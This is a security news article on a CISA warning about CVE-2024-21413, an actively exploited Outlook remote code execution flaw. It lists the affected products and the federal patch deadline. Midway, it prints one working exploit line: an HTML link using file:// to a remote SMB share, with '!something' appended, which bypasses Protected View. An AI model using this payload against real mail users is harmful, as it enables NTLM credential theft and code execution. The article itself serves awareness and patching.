The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning regarding a critical vulnerability in Microsoft Outlook, which is already being actively exploited by threat actors. The advisory is particularly directed at federal agencies. Identified as CVE-2024-21413, this flaw enables remote code execution by bypassing Outlook’s security mechanisms.
Discovered by Check Point, the vulnerability stems from improper input validation when opening emails containing malicious links in vulnerable Outlook versions. Exploiting this flaw allows attackers to circumvent Protected View, a security feature designed to block potentially dangerous content. As a result, malicious Office files open in editing mode, permitting the execution and deployment of malicious code.
Microsoft has patched CVE-2024-21413 (CVSS score: 9.8) but has cautioned that the vulnerability remains exploitable even in document preview mode. Check Point’s report highlights that adversaries have devised a workaround, appending an exclamation mark and random text after the file extension in file:// protocol links. This technique evades Outlook’s security filters and facilitates the execution of malicious payloads.
Example exploit:
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>
Affected Microsoft Products:
- Microsoft Office LTSC 2021
- Microsoft 365 Apps for Enterprise
- Microsoft Outlook 2016
- Microsoft Office 2019
Successful exploitation of this vulnerability can lead to NTLM credential theft and remote code execution on compromised systems.
Federal agencies have been mandated to remediate the flaw by February 27, in compliance with Binding Operational Directive (BOD) 22-01. CISA underscores that such vulnerabilities are highly attractive targets for cybercriminals and pose a severe risk to government infrastructure. While the directive primarily concerns federal entities, cybersecurity experts strongly urge all organizations to immediately apply security updates to mitigate potential threats.
